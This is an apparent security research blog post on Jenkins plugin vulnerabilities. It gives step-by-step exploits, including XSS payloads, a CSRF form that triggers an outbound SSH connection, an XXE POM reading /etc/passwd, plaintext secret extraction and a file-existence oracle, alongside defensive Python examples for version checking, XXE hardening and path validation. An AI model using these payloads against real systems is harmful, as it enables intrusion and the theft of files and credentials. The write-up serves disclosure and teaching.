
Jenkins - Vulnerabilities analysis part 4

source link: https://liodeus.github.io/2022/03/20/Jenkins-Vulnerabilities-analysis-part-4.html


March 20th, 2022

This post is still being written. I'll add more content when I have found vulnerable plugins and can reproduce the vulnerability. The exploit part will be more verbose; for now this will do :)

The Docker image that will serve as the lab, with all the plugins already installed, will be available soon.

Search for vulnerable plugins:
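
The quickest first pass is to compare installed plugin versions against the affected versions named in this post. The script below is an added example, not code from the original post: it reads the JSON that the Jenkins plugin manager exposes at /pluginManager/api/json?depth=1 (an assumed endpoint; fetch it with your own credentials) and flags Publish Over SSH at 1.22 or earlier, the only plugin for which this post gives a version (CVE-2022-23111, CVE-2022-23113). The sample JSON is constructed; extend the AFFECTED table as you confirm the other plugins.

```python
"""Flag installed Jenkins plugins that are at or below a known-affected version.

Added example, not part of the original post. Input is the JSON from the
Jenkins plugin manager (/pluginManager/api/json?depth=1, assumed endpoint).
"""
import json
import re

# Affected versions taken from this post: Publish Over SSH 1.22 and earlier
# (CVE-2022-23111, CVE-2022-23113). Add entries as you confirm other plugins.
AFFECTED = {
    "publish-over-ssh": ("1.22", ["CVE-2022-23111", "CVE-2022-23113"]),
}

# Constructed sample of the plugin manager output: two plugins, one affected.
SAMPLE_PLUGIN_JSON = json.dumps({
    "plugins": [
        {"shortName": "publish-over-ssh", "version": "1.22", "active": True},
        {"shortName": "dashboard-view", "version": "2.18", "active": True},
    ]
})


def version_key(version):
    """Split a plugin version like '1.22' or '2.263.1-beta' into comparable parts.

    Numeric components compare numerically; a qualifier such as '-beta' sorts
    before the bare release, so '1.22-beta' < '1.22' < '1.23' < '1.23.1'.
    """
    core, _, qualifier = version.partition("-")
    nums = tuple(int(p) for p in re.findall(r"\d+", core))
    return (nums, 0 if qualifier else 1, qualifier)


def find_vulnerable(plugin_manager_json):
    """Return [(shortName, version, [CVE, ...])] for plugins at or below an affected version."""
    hits = []
    for plugin in json.loads(plugin_manager_json).get("plugins", []):
        name = plugin.get("shortName")
        version = plugin.get("version", "")
        if name not in AFFECTED or not version:
            continue  # unknown plugin, or no version reported: nothing to compare
        max_affected, cves = AFFECTED[name]
        if version_key(version) <= version_key(max_affected):
            hits.append((name, version, cves))
    return hits


if __name__ == "__main__":
    for name, version, cves in find_vulnerable(SAMPLE_PLUGIN_JSON):
        print(f"{name} {version}: {', '.join(cves)}")
```

Feed it the real plugin manager JSON instead of SAMPLE_PLUGIN_JSON to check your own instance; the version comparison is what matters, since a plain string comparison would rank 1.9 above 1.22.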


Stored XSS vulnerability in Dashboard View Plugin

Exploit

  • New view - name it - select Dashboard
  • Add a portlet at the top of the page
  • Iframe source URL –> javascript:alert("Liodeus")

Reflected XSS vulnerability in Wall Display Master Project Plugin

Exploit

  • Click Wall Display
  • Add the customTheme parameter to the Wall Display URL: customTheme=</style><script>alert("Liodeus")</script>

CSRF vulnerability in Publish Over SSH Plugin

  • CVE-2022-23111
    • Publish Over SSH Plugin 1.22
    • https://plugins.jenkins.io/publish-over-ssh/
    • Requires Jenkins 2.263.1

Exploit

  • sudo netcat -lvnp 22
  • Host this HTML on a web page (replace the IP with your listener's). The form has no method attribute, so the browser sends a plain GET with no crumb; the vulnerable endpoint accepts that, which is what makes the request forgeable from another origin.
<html>
  <body>
    <!-- hide the visited URL in the browser history bar -->
    <script>history.pushState('', '', '/')</script>
    <!-- no method attribute: the browser submits a GET to the testConnection endpoint -->
    <form action="http://localhost:8080/descriptorByName/jenkins.plugins.publish_over_ssh.BapSshHostConfiguration/testConnection">
      <input type="hidden" name="name" value="test" />
      <input type="hidden" name="hostname" value="192.168.1.117" />
      <input type="hidden" name="username" value="test" />
      <input type="hidden" name="port" value="22" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  • Go to the web page and click the Submit request button
  • If you are already logged in to Jenkins, you should see a connection on your listener
  • If you are not logged in, Jenkins asks you to log in; the request is then executed and you should see a connection on your listener

XXE vulnerability in Performance Plugin

Exploit

  • Create a new freestyle project
  • Open it and click Pom2Config
  • Craft an XML file with the exploit:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "/etc/passwd" >]>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
  <description>&xxe;</description>
</project>
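
To see why that POM leaks a file, it helps to run it through a parser with and without external entity resolution. The script below is an added example, not code from the original post and not the Performance Plugin's Java code: it uses Python's xml.sax to parse the same payload and returns whatever ends up inside <description>. With external general entities enabled (the vulnerable configuration) the SYSTEM target is inlined; with them disabled (Python's default since 3.7.1) &xxe; expands to nothing. The target file is a constructed temporary file standing in for /etc/passwd; the function and class names are this example's own.

```python
"""Demonstrate the XXE in the POM above with a vulnerable and a hardened parser.

Added example, not part of the original post and not the Performance Plugin's
code. Python's xml.sax is used to show the parser behaviour that makes the
payload work: resolving external general entities.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# The payload from the post, with the SYSTEM identifier made a parameter.
POM_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "{path}" >]>
<project xmlns="http://maven.apache.org/POM/4.0.0">
  <description>&xxe;</description>
</project>
"""


def build_pom(path):
    """Return the XXE POM as bytes, pointing the entity at `path`."""
    return POM_TEMPLATE.format(path=path).encode()


class DescriptionCollector(ContentHandler):
    """Collect the text inside <description>, where the entity expands."""

    def __init__(self):
        super().__init__()
        self.in_description = False
        self.parts = []

    def startElement(self, name, attrs):
        if name == "description":
            self.in_description = True

    def endElement(self, name):
        if name == "description":
            self.in_description = False

    def characters(self, content):
        if self.in_description:
            self.parts.append(content)


def parse_pom(pom_bytes, resolve_external_entities):
    """Parse the POM and return the <description> text.

    resolve_external_entities=True is the vulnerable setting: the parser opens
    the SYSTEM identifier and the file contents land in the description.
    False is the hardened setting: the entity reference expands to nothing.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    collector = DescriptionCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(pom_bytes))
    return "".join(collector.parts)


def demo():
    """Constructed target file standing in for /etc/passwd.

    Returns (vulnerable_result, hardened_result).
    """
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed content
        path = f.name
    try:
        pom = build_pom(path)
        return parse_pom(pom, True), parse_pom(pom, False)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser ->", repr(leaked))
    print("hardened parser   ->", repr(safe))
```

The same split applies to any XML endpoint you test: the question is whether the parser behind it resolves external entities, and the answer shows up wherever the parsed text is echoed back, here the project description.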

Secret stored in plain text

Client Secret stored in plain text by GitLab Authentication Plugin

Exploit

  • Dashboard - Configure Global Security - Security Realm - GitLab Authentication Plugin
  • Client ID –> ThisIsASecretID
  • Client Secret –> ThisIsASecretPASSWORD
  • docker ps - get the docker:dind container name
  • docker exec -it pensive_shannon /bin/bash (use your own container name)
  • cd /var/jenkins_home
  • cat config.xml
  • The client secret appears in plain text

Path traversal

Path traversal vulnerability in Publish Over SSH Plugin

  • CVE-2022-23113
    • Publish Over SSH Plugin 1.22
    • https://plugins.jenkins.io/publish-over-ssh/
    • Requires Jenkins 2.263.1

Exploit

  • Manage Jenkins - Configure System - go to "Publish over SSH"
  • In the "Path to key" box, enter a file path to check for existence
  • If the file doesn't exist on the system: No such file : 'fileName'
  • If the file exists: no error
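
The two messages above turn a form validation into a file-existence oracle for the whole controller filesystem. The following is an added example, not code from the original post and not the Publish Over SSH Plugin's Java code: it models the same validation pattern in Python, first as described above, then confined to a key directory with a single message for everything else, so the check no longer answers questions about arbitrary paths. The function names, the key directory and the files it creates are this example's own.

```python
"""Model the "Path to key" existence oracle and a hardened validation.

Added example, not part of the original post and not the plugin's own code.
"""
import os
import tempfile

GENERIC_ERROR = "Key must be a file inside the configured key directory"


def check_key_path_vulnerable(path):
    """Validation as the post describes it: the message reveals whether any
    path on the controller exists."""
    if not os.path.isfile(path):
        return f"No such file: '{path}'"
    return None  # "no error": the file exists


def check_key_path_hardened(path, key_dir):
    """Only accept files inside key_dir and answer identically for anything
    else, so absolute paths and ../ traversal learn nothing."""
    key_dir = os.path.realpath(key_dir)
    # os.path.join discards key_dir when path is absolute; realpath then
    # resolves any ../ segments, and the commonpath check catches both cases.
    candidate = os.path.realpath(os.path.join(key_dir, path))
    if os.path.commonpath([key_dir, candidate]) != key_dir:
        return GENERIC_ERROR
    if not os.path.isfile(candidate):
        return GENERIC_ERROR
    return None


def demo():
    """Constructed layout: a key directory holding one key, plus a file outside
    it that an attacker would like to probe. Returns the validation results."""
    with tempfile.TemporaryDirectory() as root:
        key_dir = os.path.join(root, "keys")
        os.mkdir(key_dir)
        with open(os.path.join(key_dir, "id_rsa"), "w") as f:
            f.write("constructed key material\n")
        outside = os.path.join(root, "secret.txt")
        with open(outside, "w") as f:
            f.write("constructed secret\n")
        missing = os.path.join(root, "nope.txt")
        return {
            "vuln_existing_outside": check_key_path_vulnerable(outside),
            "vuln_missing": check_key_path_vulnerable(missing),
            "hard_existing_outside": check_key_path_hardened(outside, key_dir),
            "hard_missing_outside": check_key_path_hardened(missing, key_dir),
            "hard_traversal": check_key_path_hardened("../secret.txt", key_dir),
            "hard_valid": check_key_path_hardened("id_rsa", key_dir),
        }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case}: {result!r}")
```

In the vulnerable variant an existing file outside the key directory produces no error while a missing one produces "No such file", which is the oracle; in the hardened variant both, and a ../ traversal, get the same generic message, and only a real file inside the key directory passes.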

Bonus

Open redirect vulnerability in GitLab Authentication Plugin

Exploit

  • Dashboard - Configure Global Security - Security Realm - GitLab Authentication Plugin
  • GitLab Web URI –> URL
  • Go to localhost:8080
  • You are redirected to URL
